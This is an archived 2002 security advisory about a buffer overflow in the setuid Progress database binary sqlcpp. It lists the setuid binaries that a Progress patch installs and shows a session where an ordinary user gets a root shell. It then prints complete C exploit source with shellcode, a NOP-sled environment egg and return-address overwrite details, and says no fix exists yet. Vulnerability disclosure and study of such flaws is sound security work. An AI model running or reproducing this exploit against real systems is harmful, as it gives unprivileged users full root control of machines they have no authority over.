2nd Apr 2002 [SBWID-5228]
COMMAND
Progress database setuid binaries exploit
SYSTEMS AFFECTED
??
PROBLEM
\'KF\' of Snosoft [http://www.snosoft.com] posted :
Progress likes to include alot of suids in their patches... and they
GIVE them to you even if you don\'t use the software. sqlcpp was NOT
part of my install until I patched my box. Thanks for the root security
hole guys and STOP using p_stcopy()!
[root@localhost root]# tar tzvf 91C09.tar.Z | grep ws
-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
-rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv
-rwsrwxr-x patchbld/rdl 1540931 2002-02-26 08:16:52 bin/_mprshut
-rwsrwxr-x patchbld/rdl 413694 2002-02-26 08:16:53 bin/_orasrv
-rwsrwxr-x patchbld/rdl 4770560 2002-02-26 08:16:56 bin/_proapsv
-rwsrwxr-x patchbld/rdl 268161 2002-02-26 08:16:57 bin/_probrkr
-rwsrwxr-x patchbld/rdl 4260172 2002-02-26 08:17:00 bin/_probuild
-rwsrwxr-x patchbld/rdl 4614600 2002-02-26 08:17:05 bin/_progres
-rwsrwxr-x patchbld/rdl 311275 2002-02-26 08:17:06 bin/_prooibk
-rwsrwxr-x patchbld/rdl 2220962 2002-02-26 08:17:08 bin/_prooidv
-rwsrwxr-x patchbld/rdl 1692954 2002-02-26 08:17:10 bin/_proutil
-rwsrwxr-x patchbld/rdl 1126861 2002-02-26 08:17:12 bin/_rfutil
-rwsrwxr-x patchbld/rdl 4580488 2002-02-26 08:17:26 bin/orarx
-rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp
Much thanks to \"The Itch\" and his great work.
[dotslash@ghetto misc]$ id
uid=501(dotslash) gid=501(dotslash) groups=501(dotslash)
[dotslash@ghetto misc]$ cc -o sqlcppx sqlcppx.c
[dotslash@ghetto misc]$ ./sqlcppx
/usr/dlc/bin/sqlcpp
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org
Using return address: 0xbffffae4
Using buffersize : 60
sh-2.05# id
uid=0(root) gid=501(dotslash) groups=501(dotslash)
/*
* Yet another Progress Database exploit (version ??)
*
* The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
* Exploit coded up by The Itch / Promisc (http://www.promisc.org)
*
* This exploit was developed on the Snosoft vulnerability research machines
* mail dotslash@snosoft.com if you are interested in contributing research time
*
* - The Itch
* - itchie@promisc.org
*
* - Technical details concerning the exploit -
*
* 1). Buffer overflow occurs after writing more then 56 bytes into the buffer at the command line
* (56 to overwrite ebp, 60 to overwrite eip).
* 2). If you write more then 65 bytes, other frames will be overwritten afterwards and will mess up
* your flow of arbitrary code execution.
*/
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 60
char shellcode[] =
\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\"
\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"
\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"
\"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";
int main(int argc, char *argv[])
{
char *buff;
char *egg;
char *ptr;
long *addr_ptr;
long addr;
int bsize = DEFAULT_BUFFER_SIZE;
int eggsize = DEFAULT_EGG_SIZE;
int i;
int get_sp = (int)&get_sp;
if(argc > 1) { bsize = atoi(argv[1]); }
if(!(buff = malloc(bsize)))
{
printf(\"unable to allocate memory for %d bytes\\n\", bsize);
exit(1);
}
if(!(egg = malloc(eggsize)))
{
printf(\"unable to allocate memory for %d bytes\\n\", eggsize);
exit(1);
}
printf(\"/usr/dlc/bin/sqlcpp\\n\");
printf(\"Vulnerability found by KF / http://www.snosoft.com\\n\");
printf(\"Coded by The Itch / http://www.promisc.org\\n\\n\");
printf(\"Using return address: 0x%x\\n\", get_sp);
printf(\"Using buffersize : %d\\n\", bsize);
ptr = buff;
addr_ptr = (long *) ptr;
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
{
*(ptr++) = NOP;
}
for(i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
egg[eggsize - 1] = \'\\0\';
memcpy(egg, \"EGG=\", 4);
putenv(egg);
execl(\"/usr/dlc/sqlcpp\", \"sqlcpp\", buff, 0);
return 0;
}
SOLUTION
None yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
